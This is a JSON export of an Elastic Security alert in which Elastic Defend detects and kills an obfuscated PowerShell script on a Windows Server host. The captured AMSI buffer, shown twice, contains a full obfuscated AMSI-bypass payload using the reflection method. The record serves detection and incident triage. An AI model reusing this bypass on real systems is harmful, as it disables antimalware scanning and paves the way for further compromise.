Created
          October 14, 2025 15:24 
        
  | { | |
| "_index": ".internal.alerts-security.alerts-default-000002", | |
| "_id": "f5416543d2a90170e669a1304a4a3afd73311220b52072064b09c619f5e31659", | |
| "_score": 1, | |
| "_source": { | |
| "kibana.alert.rule.execution.timestamp": "2025-10-14T15:22:17.403Z", | |
| "kibana.alert.start": "2025-10-14T15:22:17.403Z", | |
| "kibana.alert.last_detected": "2025-10-14T15:22:17.403Z", | |
| "kibana.version": "9.1.2", | |
| "kibana.alert.rule.parameters": { | |
| "description": "Generates a detection alert each time an Elastic Defend alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.", | |
| "risk_score": 47, | |
| "severity": "medium", | |
| "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Endpoint Security (Elastic Defend)\n\nElastic Defend is a robust endpoint security solution that monitors and protects systems by analyzing events and generating alerts for suspicious activities. Adversaries may exploit endpoints by executing unauthorized code or manipulating system processes. The detection rule leverages event data to identify alerts from Elastic Defend, focusing on potential threats while excluding non-relevant modules, thus enabling timely investigation of endpoint anomalies.\n\n### Possible investigation steps\n\n- Review the alert details to understand the specific event.kind:alert and event.module: endpoint that triggered the alert, ensuring it is not related to the excluded endgame module.\n- Examine the timeline of events leading up to the alert to identify any unusual or unauthorized activities, such as unexpected process executions or system changes.\n- Correlate the alert with other security events or logs from the same endpoint to gather additional context and determine if there is a pattern of suspicious behavior.\n- Investigate the source and destination of any network connections associated with the alert to identify potential command and control activity or data exfiltration attempts.\n- Check for any recent changes or updates to the endpoint's software or configuration that could explain the alert, ensuring they are legitimate and authorized.\n- Assess the risk score and severity of the alert in conjunction with other alerts from the same endpoint to prioritize the investigation and response efforts.\n\n### False positive analysis\n\n- Alerts triggered by routine 
software updates can be false positives. Users can create exceptions for known update processes to prevent unnecessary alerts.\n- System maintenance activities, such as scheduled scans or backups, may generate alerts. Exclude these activities by identifying their specific event signatures and adding them to the exception list.\n- Legitimate administrative actions, like remote desktop sessions or script executions by IT staff, might be flagged. Define exceptions for these actions by correlating them with authorized user accounts or IP addresses.\n- Frequent alerts from non-malicious applications that interact with system processes can be excluded by whitelisting these applications based on their hash or path.\n- Network monitoring tools that simulate attack patterns for testing purposes may trigger alerts. Exclude these tools by specifying their known behaviors and IP ranges in the exception settings.\n\n### Response and remediation\n\n- Isolate the affected endpoint immediately to prevent further unauthorized access or lateral movement within the network.\n- Analyze the alert details to identify the specific unauthorized code or process manipulation involved, and terminate any malicious processes identified.\n- Remove any unauthorized code or files from the affected endpoint, ensuring that all traces of the threat are eradicated.\n- Conduct a thorough review of system logs and event data to identify any additional indicators of compromise or related suspicious activities.\n- Update endpoint security configurations and signatures to prevent similar threats from exploiting the same vulnerabilities in the future.\n- Restore the affected endpoint from a known good backup if necessary, ensuring that the system is free from any residual threats.\n- Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional systems may be affected.", | |
| "license": "Elastic License v2", | |
| "rule_name_override": "message", | |
| "timestamp_override": "event.ingested", | |
| "author": [ | |
| "Elastic" | |
| ], | |
| "false_positives": [], | |
| "from": "now-2m", | |
| "rule_id": "9a1a2dae-0b5f-4c3d-8305-a268d404c306", | |
| "max_signals": 1000, | |
| "risk_score_mapping": [ | |
| { | |
| "field": "event.risk_score", | |
| "operator": "equals", | |
| "value": "" | |
| } | |
| ], | |
| "severity_mapping": [ | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "low", | |
| "value": "21" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "medium", | |
| "value": "47" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "high", | |
| "value": "73" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "critical", | |
| "value": "99" | |
| } | |
| ], | |
| "threat": [], | |
| "to": "now", | |
| "references": [], | |
| "version": 108, | |
| "exceptions_list": [ | |
| { | |
| "id": "endpoint_list", | |
| "list_id": "endpoint_list", | |
| "type": "endpoint", | |
| "namespace_type": "agnostic" | |
| } | |
| ], | |
| "immutable": true, | |
| "rule_source": { | |
| "type": "external", | |
| "is_customized": false | |
| }, | |
| "related_integrations": [ | |
| { | |
| "package": "endpoint", | |
| "version": "^9.0.0" | |
| } | |
| ], | |
| "required_fields": [ | |
| { | |
| "name": "event.kind", | |
| "type": "keyword", | |
| "ecs": true | |
| }, | |
| { | |
| "name": "event.module", | |
| "type": "keyword", | |
| "ecs": true | |
| } | |
| ], | |
| "setup": "## Setup\n\n### Elastic Defend Alerts\nIf this rule is disabled, you will not receive alerts for Elastic Defend alerts. This rule is designed to capture all alerts generated by Elastic Defend. For more granular alerting, consider using additional prebuilt-rules that capture specific Elastic Defend alerts.\n\nIf this rule is enabled, along with the related rules listed below, you will receive duplicate alerts for the same events. To avoid this, it is recommended to disable this generic rule and enable the more specific rules that capture these alerts separately.\n\nRelated rules:\n- Behavior - Detected - Elastic Defend (UUID: 0f615fe4-eaa2-11ee-ae33-f661ea17fbce)\n- Behavior - Prevented - Elastic Defend (UUID: eb804972-ea34-11ee-a417-f661ea17fbce)\n- Malicious File - Detected - Elastic Defend (UUID: f2c3caa6-ea34-11ee-a417-f661ea17fbce)\n- Malicious File - Prevented - Elastic Defend (UUID: f87e6122-ea34-11ee-a417-f661ea17fbce)\n- Memory Threat - Detected - Elastic Defend (UUID: 017de1e4-ea35-11ee-a417-f661ea17fbce)\n- Memory Threat - Prevented - Elastic Defend (UUID: 06f3a26c-ea35-11ee-a417-f661ea17fbce)\n- Ransomware - Detected - Elastic Defend (UUID: 0c74cd7e-ea35-11ee-a417-f661ea17fbce)\n- Ransomware - Prevented - Elastic Defend (UUID: 10f3d520-ea35-11ee-a417-f661ea17fbce)\n\n### Additional notes\n\nFor information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).\n", | |
| "type": "query", | |
| "language": "kuery", | |
| "index": [ | |
| "logs-endpoint.alerts-*" | |
| ], | |
| "query": "event.kind:alert and event.module:(endpoint and not endgame)\n" | |
| }, | |
| "kibana.alert.rule.category": "Custom Query Rule", | |
| "kibana.alert.rule.consumer": "siem", | |
| "kibana.alert.rule.execution.uuid": "f57614b2-41d6-4d61-bba2-ed5d8a040f12", | |
| "kibana.alert.rule.name": "Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script", | |
| "kibana.alert.rule.producer": "siem", | |
| "kibana.alert.rule.revision": 0, | |
| "kibana.alert.rule.rule_type_id": "siem.queryRule", | |
| "kibana.alert.rule.uuid": "0a1f09ab-3c54-44a0-b434-b6af4e252a3f", | |
| "kibana.space_ids": [ | |
| "default" | |
| ], | |
| "kibana.alert.rule.tags": [ | |
| "Data Source: Elastic Defend", | |
| "Resources: Investigation Guide" | |
| ], | |
| "@timestamp": "2025-10-14T15:22:17.361Z", | |
| "agent": { | |
| "build": { | |
| "original": "version: 9.1.2, compiled: Thu Aug 7 15:00:00 2025, branch: HEAD, commit: 26c15136855b7ac73fdaa74b77e6492f254420c5" | |
| }, | |
| "id": "6570a119-1004-44eb-b3eb-5324657de79e", | |
| "type": "endpoint", | |
| "version": "9.1.2" | |
| }, | |
| "process": { | |
| "Ext": { | |
| "code_signature": [ | |
| { | |
| "trusted": true, | |
| "subject_name": "Microsoft Windows", | |
| "exists": true, | |
| "status": "trusted" | |
| } | |
| ], | |
| "api": { | |
| "summary": "AmsiScanBuffer( PowerShell, NULL, 69238e486d9598d02da6f03bbb7abd998911e42c5936619f4c00e4ff0cd598c9 )", | |
| "metadata": { | |
| "return_value": 1 | |
| }, | |
| "name": "AmsiScanBuffer", | |
| "parameters": { | |
| "app_name": "PowerShell", | |
| "size": 3822, | |
| "buffer": "$MV3l1C=$null;$rWS16tHn4=\"System.$(('Mánäg'+'èmênt').NoRmAliZE([Char](70)+[cHAR](111)+[ChaR](114+75-75)+[cHAR](65+44)+[chAr]([ByTe]0x44)) -replace [cHar](92*70/70)+[Char]([bytE]0x70)+[ChaR]([ByTE]0x7b)+[Char](77)+[chaR](108+2)+[chAR]([byTE]0x7d)).$(('Äú'+'tô'+'mä'+'tì'+'õn').NOrmaliZe([chAr](70*53/53)+[CHaR]([bytE]0x6f)+[cHaR]([BYTE]0x72)+[chAr](109)+[cHAr](10+58)) -replace [chAr](92+90-90)+[chAr]([bYTE]0x70)+[chAR](123+7-7)+[cHaR]([bYte]0x4d)+[cHAr]([bytE]0x6e)+[ChAR]([bYTe]0x7d)).$(('Á'+'m'+'s'+'î'+'Ù'+'t'+'í'+'l'+'s').nORMalIze([CHAR](14+56)+[chAR]([bYtE]0x6f)+[chAr]([bYte]0x72)+[CHaR](109*15/15)+[char]([bYtE]0x44)) -replace [CHAR](92+51-51)+[ChaR]([BYte]0x70)+[chaR]([Byte]0x7b)+[chAR]([BytE]0x4d)+[ChAR]([bytE]0x6e)+[ChaR](125))\";$igaqlsqbbrpoqjdswzgcmyrdbwdoj=\"+[chaR](99*97/97)+[CHAr]([BYTE]0x72)+[cHar]([byte]0x71)+[CHar](100+3-3)+[CHAR]([ByTE]0x65)+[Char](103*40/40)+[chAR](117*11/11)+[ChAr](115+45-45)+[cHAR](120)+[cHaR](113)+[cHAr]([BYTE]0x78)+[CHar]([bYtE]0x6b)+[Char](64+40)+[cHAR]([BYtE]0x62)+[CHAr]([BYte]0x7a)+[char](71+38)+[CHar]([byTE]0x6f)+[chAr](105*92/92)+[CHAR]([byte]0x66)+[Char](111+37-37)+[Char]([BYte]0x64)+[cHAr]([byTe]0x6a)\";[Threading.Thread]::Sleep(1873);[Ref].Assembly.GetType($rWS16tHn4).GetField($(('àmsì'+'Înít'+'Fâíl'+'êd').NOrMaLIze([CHAR](30+40)+[chAR]([BYTe]0x6f)+[char](114)+[cHar]([BYte]0x6d)+[chAr](1+67)) -replace [CHAr](44+48)+[chAR](112+105-105)+[chaR](123+92-92)+[chAr](77)+[CHAR]([Byte]0x6e)+[CHaR]([byte]0x7d)),\"NonPublic,Static\").SetValue($MV3l1C,$true);$qrxwkay=\"+[ChAr]([Byte]0x69)+[chAR]([byte]0x6e)+[ChaR]([byte]0x7a)+[cHAr]([BYTE]0x72)+[chAR](97+56-56)+[CHar]([bYtE]0x64)+[CHar](115)+[char]([bytE]0x61)+[cHAR](121)+[cHar]([BYtE]0x6e)+[chAR]([bytE]0x67)+[ChaR](98+77-77)+[CHaR](54+46)+[chAR]([bYTe]0x79)+[ChaR](61+46)+[ChAR](116)+[CHar](97*85/85)+[cHaR]([byTe]0x62)+[ChAR]([ByTE]0x6b)\";[Threading.Thread]::Sleep(1232)\n#Matt Graebers Reflection method " | |
| } | |
| }, | |
| "token": { | |
| "integrity_level_name": "high" | |
| } | |
| }, | |
| "args": [ | |
| "powershell" | |
| ], | |
| "parent": { | |
| "executable": "C:\\Windows\\System32\\cmd.exe" | |
| }, | |
| "code_signature": { | |
| "trusted": true, | |
| "subject_name": "Microsoft Windows", | |
| "exists": true, | |
| "status": "trusted" | |
| }, | |
| "pe": { | |
| "imphash": "741776aaccfc5b71ff59832dcdcace0f", | |
| "original_file_name": "PowerShell.EXE" | |
| }, | |
| "name": "powershell.exe", | |
| "pid": 1968, | |
| "args_count": 1, | |
| "entity_id": "Fr+lArd4jbWUm9nDJqjXuw", | |
| "command_line": "powershell", | |
| "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", | |
| "hash": { | |
| "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c" | |
| } | |
| }, | |
| "rule": { | |
| "name": "Potential Obfuscated PowerShell Script", | |
| "ruleset": "production", | |
| "description": "Identifies the execution of PowerShell with potentially obfuscated content. This behavior is often observed during malware installation leveraging PowerShell.", | |
| "id": "f4db84b1-13d8-432d-999a-54a09784e62b", | |
| "version": "1.0.4" | |
| }, | |
| "message": "Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script", | |
| "Responses": [ | |
| { | |
| "result": 0, | |
| "process": { | |
| "name": "powershell.exe", | |
| "pid": 1968, | |
| "entity_id": "Fr+lArd4jbWUm9nDJqjXuw" | |
| }, | |
| "@timestamp": "2025-10-14T15:21:30.5966574Z", | |
| "action": { | |
| "field": "process.entity_id", | |
| "action": "kill_process", | |
| "state": 0 | |
| }, | |
| "message": "Success" | |
| } | |
| ], | |
| "Endpoint": { | |
| "policy": { | |
| "applied": { | |
| "name": "myDefend", | |
| "id": "27c05512-d3ed-4826-9f1d-d8876a66d61a", | |
| "endpoint_policy_version": "11", | |
| "version": "12", | |
| "artifacts": { | |
| "global": { | |
| "manifest_type": "stable", | |
| "identifiers": [ | |
| { | |
| "sha256": "44341700c27a82d3b4a8471cfe8a57447fc6ddbac8f1e855707dd3767e9491e2", | |
| "name": "diagnostic-configuration-v1" | |
| }, | |
| { | |
| "sha256": "338eb3e0d0c2b7efcd291ca270a0a6188d3632a25c7a8dc5d020fdb44293e12f", | |
| "name": "diagnostic-endpointpe-v4-blocklist" | |
| }, | |
| { | |
| "sha256": "9399bb8a3210f3ffea4e028eb3d087455bab6678df8b56ad77f276ee376533ef", | |
| "name": "diagnostic-endpointpe-v4-exceptionlist" | |
| }, | |
| { | |
| "sha256": "eae3c9a96708f28da4346ee245b8d673642ee9295e0f0aa4192889d4ade3616a", | |
| "name": "diagnostic-endpointpe-v4-model" | |
| }, | |
| { | |
| "sha256": "fd827c57f7b99723b3f6f7dbf0c2644ac5147f4ebbe320edc6ccd4b7ce68001c", | |
| "name": "diagnostic-malware-signature-v1-windows" | |
| }, | |
| { | |
| "sha256": "9636fb1bda16d4dc236d40d2aeb379f30d81276028e9b3048002e3ca6a83dfb5", | |
| "name": "diagnostic-ransomware-v1-windows" | |
| }, | |
| { | |
| "sha256": "81af5fca19bd11e5f167685e1b638ad360d08c39af8264144464e6991019ad28", | |
| "name": "diagnostic-rules-windows-v1" | |
| }, | |
| { | |
| "sha256": "1c0de0df678f1e42eed7635722be3e82fd6731585bc2618086d126ec9b70121b", | |
| "name": "endpointpe-v4-blocklist" | |
| }, | |
| { | |
| "sha256": "6aa317caa75a727cb988c45e8af7d5c0fc5e722a6322aad190bc3c8bf56c2e3d", | |
| "name": "endpointpe-v4-exceptionlist" | |
| }, | |
| { | |
| "sha256": "cf2335c28acaee3072ffd893f229242be71ba75043ae96576227f9fea651c497", | |
| "name": "endpointpe-v4-model" | |
| }, | |
| { | |
| "sha256": "85501044f22938c806155e33a171abbce9eb4c1544d45d45c6c049c7cb1395d7", | |
| "name": "global-configuration-v1" | |
| }, | |
| { | |
| "sha256": "3a6bf42f273a2e663d9ad273b445cca21d9da8bb336f6f62b262dc55598e1005", | |
| "name": "global-eventfilterlist-windows-v1" | |
| }, | |
| { | |
| "sha256": "f50a756ecf8fd5c4fbe40efbec2bac52f9deb1dab44850f107b4b27663406573", | |
| "name": "global-exceptionlist-windows" | |
| }, | |
| { | |
| "sha256": "aaeab218a20828574c347e88ecb4eb411ffca9e8496c484327b2213f49e1dc9e", | |
| "name": "global-trustlist-windows-v1" | |
| }, | |
| { | |
| "sha256": "1fa3b2936f9cc7adcef6d0af6803f32cb1e965b1297056620396ce31605151ac", | |
| "name": "production-malware-signature-v1-windows" | |
| }, | |
| { | |
| "sha256": "e3efc40c7e3fc0a590a074011abf990ab120f9f182b3dbca7b32ee58d0e5c3aa", | |
| "name": "production-ransomware-v1-windows" | |
| }, | |
| { | |
| "sha256": "608fb0db8fa37493c5cdcbb4e319ff911937bb8b021efc3efb7d58d1cf88d3bf", | |
| "name": "production-rules-windows-v1" | |
| }, | |
| { | |
| "sha256": "07f2a166efe84d3b52b6cd8b841f33ffe6eb8e2297cefd4eaa3e50e567b4d30e", | |
| "name": "tamper-protection-config-v1" | |
| } | |
| ], | |
| "channel": "default", | |
| "update_age": 0, | |
| "version": "1.0.1638+2025-10-13-daily", | |
| "snapshot": "latest" | |
| }, | |
| "user": { | |
| "identifiers": [ | |
| { | |
| "sha256": "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "name": "endpoint-blocklist-windows-v1" | |
| }, | |
| { | |
| "sha256": "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "name": "endpoint-eventfilterlist-windows-v1" | |
| }, | |
| { | |
| "sha256": "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "name": "endpoint-exceptionlist-windows-v1" | |
| }, | |
| { | |
| "sha256": "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "name": "endpoint-hostisolationexceptionlist-windows-v1" | |
| }, | |
| { | |
| "sha256": "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "name": "endpoint-trustlist-windows-v1" | |
| } | |
| ], | |
| "version": "1.0.0" | |
| } | |
| } | |
| } | |
| } | |
| }, | |
| "ecs": { | |
| "version": "8.10.0" | |
| }, | |
| "Events": [ | |
| { | |
| "process": { | |
| "Ext": { | |
| "code_signature": [ | |
| { | |
| "trusted": true, | |
| "subject_name": "Microsoft Windows", | |
| "exists": true, | |
| "status": "trusted" | |
| } | |
| ], | |
| "api": { | |
| "summary": "AmsiScanBuffer( PowerShell, NULL, 69238e486d9598d02da6f03bbb7abd998911e42c5936619f4c00e4ff0cd598c9 )", | |
| "metadata": { | |
| "return_value": 1 | |
| }, | |
| "name": "AmsiScanBuffer", | |
| "parameters": { | |
| "app_name": "PowerShell", | |
| "size": 3822, | |
| "buffer": "$MV3l1C=$null;$rWS16tHn4=\"System.$(('Mánäg'+'èmênt').NoRmAliZE([Char](70)+[cHAR](111)+[ChaR](114+75-75)+[cHAR](65+44)+[chAr]([ByTe]0x44)) -replace [cHar](92*70/70)+[Char]([bytE]0x70)+[ChaR]([ByTE]0x7b)+[Char](77)+[chaR](108+2)+[chAR]([byTE]0x7d)).$(('Äú'+'tô'+'mä'+'tì'+'õn').NOrmaliZe([chAr](70*53/53)+[CHaR]([bytE]0x6f)+[cHaR]([BYTE]0x72)+[chAr](109)+[cHAr](10+58)) -replace [chAr](92+90-90)+[chAr]([bYTE]0x70)+[chAR](123+7-7)+[cHaR]([bYte]0x4d)+[cHAr]([bytE]0x6e)+[ChAR]([bYTe]0x7d)).$(('Á'+'m'+'s'+'î'+'Ù'+'t'+'í'+'l'+'s').nORMalIze([CHAR](14+56)+[chAR]([bYtE]0x6f)+[chAr]([bYte]0x72)+[CHaR](109*15/15)+[char]([bYtE]0x44)) -replace [CHAR](92+51-51)+[ChaR]([BYte]0x70)+[chaR]([Byte]0x7b)+[chAR]([BytE]0x4d)+[ChAR]([bytE]0x6e)+[ChaR](125))\";$igaqlsqbbrpoqjdswzgcmyrdbwdoj=\"+[chaR](99*97/97)+[CHAr]([BYTE]0x72)+[cHar]([byte]0x71)+[CHar](100+3-3)+[CHAR]([ByTE]0x65)+[Char](103*40/40)+[chAR](117*11/11)+[ChAr](115+45-45)+[cHAR](120)+[cHaR](113)+[cHAr]([BYTE]0x78)+[CHar]([bYtE]0x6b)+[Char](64+40)+[cHAR]([BYtE]0x62)+[CHAr]([BYte]0x7a)+[char](71+38)+[CHar]([byTE]0x6f)+[chAr](105*92/92)+[CHAR]([byte]0x66)+[Char](111+37-37)+[Char]([BYte]0x64)+[cHAr]([byTe]0x6a)\";[Threading.Thread]::Sleep(1873);[Ref].Assembly.GetType($rWS16tHn4).GetField($(('àmsì'+'Înít'+'Fâíl'+'êd').NOrMaLIze([CHAR](30+40)+[chAR]([BYTe]0x6f)+[char](114)+[cHar]([BYte]0x6d)+[chAr](1+67)) -replace [CHAr](44+48)+[chAR](112+105-105)+[chaR](123+92-92)+[chAr](77)+[CHAR]([Byte]0x6e)+[CHaR]([byte]0x7d)),\"NonPublic,Static\").SetValue($MV3l1C,$true);$qrxwkay=\"+[ChAr]([Byte]0x69)+[chAR]([byte]0x6e)+[ChaR]([byte]0x7a)+[cHAr]([BYTE]0x72)+[chAR](97+56-56)+[CHar]([bYtE]0x64)+[CHar](115)+[char]([bytE]0x61)+[cHAR](121)+[cHar]([BYtE]0x6e)+[chAR]([bytE]0x67)+[ChaR](98+77-77)+[CHaR](54+46)+[chAR]([bYTe]0x79)+[ChaR](61+46)+[ChAR](116)+[CHar](97*85/85)+[cHaR]([byTe]0x62)+[ChAR]([ByTE]0x6b)\";[Threading.Thread]::Sleep(1232)\n#Matt Graebers Reflection method " | |
| } | |
| }, | |
| "token": { | |
| "integrity_level_name": "high" | |
| } | |
| }, | |
| "parent": { | |
| "executable": "C:\\Windows\\System32\\cmd.exe" | |
| }, | |
| "code_signature": { | |
| "trusted": true, | |
| "subject_name": "Microsoft Windows", | |
| "exists": true, | |
| "status": "trusted" | |
| }, | |
| "name": "powershell.exe", | |
| "pid": 1968, | |
| "entity_id": "Fr+lArd4jbWUm9nDJqjXuw", | |
| "command_line": "powershell", | |
| "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" | |
| }, | |
| "@timestamp": "2025-10-14T15:21:30.2270851Z", | |
| "_state": 0, | |
| "host": { | |
| "hostname": "win-svr-2019-st", | |
| "os": { | |
| "Ext": { | |
| "variant": "Windows Server 2019 Standard" | |
| }, | |
| "kernel": "1809 (10.0.17763.2061)", | |
| "name": "Windows", | |
| "family": "windows", | |
| "type": "windows", | |
| "version": "1809 (10.0.17763.2061)", | |
| "platform": "windows", | |
| "full": "Windows Server 2019 Standard 1809 (10.0.17763.2061)" | |
| }, | |
| "ip": [ | |
| "10.0.0.19", | |
| "fe80::382c:f652:1d40:ee4e", | |
| "192.168.56.1", | |
| "fe80::5d9e:2b92:1905:13a8", | |
| "127.0.0.1", | |
| "::1" | |
| ], | |
| "name": "win-svr-2019-st", | |
| "id": "cb7eef6d-979b-434c-b48f-5a91a9c6cfcf", | |
| "mac": [ | |
| "00-50-56-11-7d-d9", | |
| "0a-00-27-00-00-04" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "event": { | |
| "provider": "Microsoft-Antimalware-Scan-Interface", | |
| "created": "2025-10-14T15:21:30.5741785Z", | |
| "kind": "event", | |
| "id": "OCsWZ8Jp4Gz3668A++++g337", | |
| "category": [ | |
| "api" | |
| ], | |
| "type": [ | |
| "allowed" | |
| ], | |
| "outcome": "unknown" | |
| }, | |
| "message": "Endpoint API event - AmsiScanBuffer", | |
| "user": { | |
| "domain": "WIN-SVR-2019-ST", | |
| "name": "Administrator", | |
| "id": "S-1-5-21-2202811333-351044183-798744757-500" | |
| }, | |
| "_label": "amsi_powershell_obfuscation_pattern" | |
| } | |
| ], | |
| "data_stream": { | |
| "namespace": "default", | |
| "type": "logs", | |
| "dataset": "endpoint.alerts" | |
| }, | |
| "elastic": { | |
| "agent": { | |
| "id": "6570a119-1004-44eb-b3eb-5324657de79e" | |
| } | |
| }, | |
| "host": { | |
| "hostname": "win-svr-2019-st", | |
| "os": { | |
| "Ext": { | |
| "variant": "Windows Server 2019 Standard" | |
| }, | |
| "kernel": "1809 (10.0.17763.2061)", | |
| "name": "Windows", | |
| "family": "windows", | |
| "type": "windows", | |
| "version": "1809 (10.0.17763.2061)", | |
| "platform": "windows", | |
| "full": "Windows Server 2019 Standard 1809 (10.0.17763.2061)" | |
| }, | |
| "ip": [ | |
| "10.0.0.19", | |
| "fe80::382c:f652:1d40:ee4e", | |
| "192.168.56.1", | |
| "fe80::5d9e:2b92:1905:13a8", | |
| "127.0.0.1", | |
| "::1" | |
| ], | |
| "name": "win-svr-2019-st", | |
| "id": "cb7eef6d-979b-434c-b48f-5a91a9c6cfcf", | |
| "mac": [ | |
| "00-50-56-11-7d-d9", | |
| "0a-00-27-00-00-04" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "threat": [ | |
| { | |
| "framework": "MITRE ATT&CK", | |
| "technique": [ | |
| { | |
| "reference": "https://attack.mitre.org/techniques/T1059/", | |
| "name": "Command and Scripting Interpreter", | |
| "subtechnique": [ | |
| { | |
| "reference": "https://attack.mitre.org/techniques/T1059/001/", | |
| "name": "PowerShell", | |
| "id": "T1059.001" | |
| } | |
| ], | |
| "id": "T1059" | |
| } | |
| ], | |
| "tactic": { | |
| "reference": "https://attack.mitre.org/tactics/TA0002/", | |
| "name": "Execution", | |
| "id": "TA0002" | |
| } | |
| } | |
| ], | |
| "event": { | |
| "severity": 73, | |
| "code": "behavior", | |
| "risk_score": 73, | |
| "created": "2025-10-14T15:21:30.5762347Z", | |
| "module": "endpoint", | |
| "type": [ | |
| "info", | |
| "denied" | |
| ], | |
| "agent_id_status": "verified", | |
| "sequence": 106319, | |
| "ingested": "2025-10-14T15:22:06Z", | |
| "action": "rule_detection", | |
| "id": "OCsWZ8Jp4Gz3668A++++g348", | |
| "category": [ | |
| "malware", | |
| "intrusion_detection" | |
| ], | |
| "dataset": "endpoint.alerts", | |
| "outcome": "success" | |
| }, | |
| "user": { | |
| "domain": "WIN-SVR-2019-ST", | |
| "name": "Administrator", | |
| "id": "S-1-5-21-2202811333-351044183-798744757-500" | |
| }, | |
| "kibana.alert.original_data_stream.namespace": "default", | |
| "kibana.alert.original_data_stream.type": "logs", | |
| "kibana.alert.original_data_stream.dataset": "endpoint.alerts", | |
| "kibana.alert.original_event.severity": 73, | |
| "kibana.alert.original_event.code": "behavior", | |
| "kibana.alert.original_event.risk_score": 73, | |
| "kibana.alert.original_event.created": "2025-10-14T15:21:30.5762347Z", | |
| "kibana.alert.original_event.kind": "alert", | |
| "kibana.alert.original_event.module": "endpoint", | |
| "kibana.alert.original_event.type": [ | |
| "info", | |
| "denied" | |
| ], | |
| "kibana.alert.original_event.agent_id_status": "verified", | |
| "kibana.alert.original_event.sequence": 106319, | |
| "kibana.alert.original_event.ingested": "2025-10-14T15:22:06Z", | |
| "kibana.alert.original_event.action": "rule_detection", | |
| "kibana.alert.original_event.id": "OCsWZ8Jp4Gz3668A++++g348", | |
| "kibana.alert.original_event.category": [ | |
| "malware", | |
| "intrusion_detection" | |
| ], | |
| "kibana.alert.original_event.dataset": "endpoint.alerts", | |
| "kibana.alert.original_event.outcome": "success", | |
| "event.kind": "signal", | |
| "kibana.alert.original_time": "2025-10-14T15:21:30.576Z", | |
| "kibana.alert.ancestors": [ | |
| { | |
| "id": "AZnjUAfs4fyCfCR7INh3", | |
| "type": "event", | |
| "index": ".ds-logs-endpoint.alerts-default-2025.09.24-000002", | |
| "depth": 0 | |
| } | |
| ], | |
| "kibana.alert.status": "active", | |
| "kibana.alert.workflow_status": "open", | |
| "kibana.alert.depth": 1, | |
| "kibana.alert.reason": "malware, intrusion_detection event with process powershell.exe, by Administrator on win-svr-2019-st created high alert Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script.", | |
| "kibana.alert.severity": "high", | |
| "kibana.alert.risk_score": 73, | |
| "kibana.alert.rule.actions": [], | |
| "kibana.alert.rule.author": [ | |
| "Elastic" | |
| ], | |
| "kibana.alert.rule.created_at": "2025-08-25T09:37:22.832Z", | |
| "kibana.alert.rule.created_by": "586246785", | |
| "kibana.alert.rule.description": "Generates a detection alert each time an Elastic Defend alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.", | |
| "kibana.alert.rule.enabled": true, | |
| "kibana.alert.rule.exceptions_list": [ | |
| { | |
| "id": "endpoint_list", | |
| "list_id": "endpoint_list", | |
| "type": "endpoint", | |
| "namespace_type": "agnostic" | |
| } | |
| ], | |
| "kibana.alert.rule.false_positives": [], | |
| "kibana.alert.rule.from": "now-2m", | |
| "kibana.alert.rule.immutable": true, | |
| "kibana.alert.rule.interval": "1m", | |
| "kibana.alert.rule.indices": [ | |
| "logs-endpoint.alerts-*" | |
| ], | |
| "kibana.alert.rule.license": "Elastic License v2", | |
| "kibana.alert.rule.max_signals": 1000, | |
| "kibana.alert.rule.note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Endpoint Security (Elastic Defend)\n\nElastic Defend is a robust endpoint security solution that monitors and protects systems by analyzing events and generating alerts for suspicious activities. Adversaries may exploit endpoints by executing unauthorized code or manipulating system processes. The detection rule leverages event data to identify alerts from Elastic Defend, focusing on potential threats while excluding non-relevant modules, thus enabling timely investigation of endpoint anomalies.\n\n### Possible investigation steps\n\n- Review the alert details to understand the specific event.kind:alert and event.module: endpoint that triggered the alert, ensuring it is not related to the excluded endgame module.\n- Examine the timeline of events leading up to the alert to identify any unusual or unauthorized activities, such as unexpected process executions or system changes.\n- Correlate the alert with other security events or logs from the same endpoint to gather additional context and determine if there is a pattern of suspicious behavior.\n- Investigate the source and destination of any network connections associated with the alert to identify potential command and control activity or data exfiltration attempts.\n- Check for any recent changes or updates to the endpoint's software or configuration that could explain the alert, ensuring they are legitimate and authorized.\n- Assess the risk score and severity of the alert in conjunction with other alerts from the same endpoint to prioritize the investigation and response efforts.\n\n### False positive analysis\n\n- Alerts 
